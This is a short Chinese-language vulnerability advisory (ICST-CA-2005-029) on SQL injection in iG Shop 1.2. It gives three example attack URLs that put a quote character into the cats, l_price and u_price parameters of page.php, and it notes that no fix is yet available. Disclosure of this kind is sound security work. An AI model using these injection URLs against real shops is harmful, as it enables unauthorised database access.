iG Shop Input Validation Bugs Let Remote Users Execute SQL

漏洞名稱： iG Shop Input Validation Bugs Let Remote Users Execute SQL Commands
漏洞編號： ICST-CA-2005-029
漏洞說明： iG Shop中存在漏洞,遠端使用者可以藉此注入SQL指令
底下列出一些URL入侵範例
http://[target]/page.php?page_type=catalog_product s&type_id[]=2 &SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='
http://[target]/page.php?page_type=catalog_products&type_id[]=2 &SESSION _ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search =1&l_price='&u_price=1&Submit=Search

http://[target]/page.php?page_type=catalog_products&type_ id[]=2 &SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search =1&l_price=1&u_price='&Submit=Search


影響平台： iG Shop 1.2版

影響狀況： 遠端使用者可以對資料庫系統下任意SQL指令

解決方案： 目前尚無確切解決方案

參考資料： iG Shop Input Validation Bugs Let Remote Users Execute SQL Commands

x0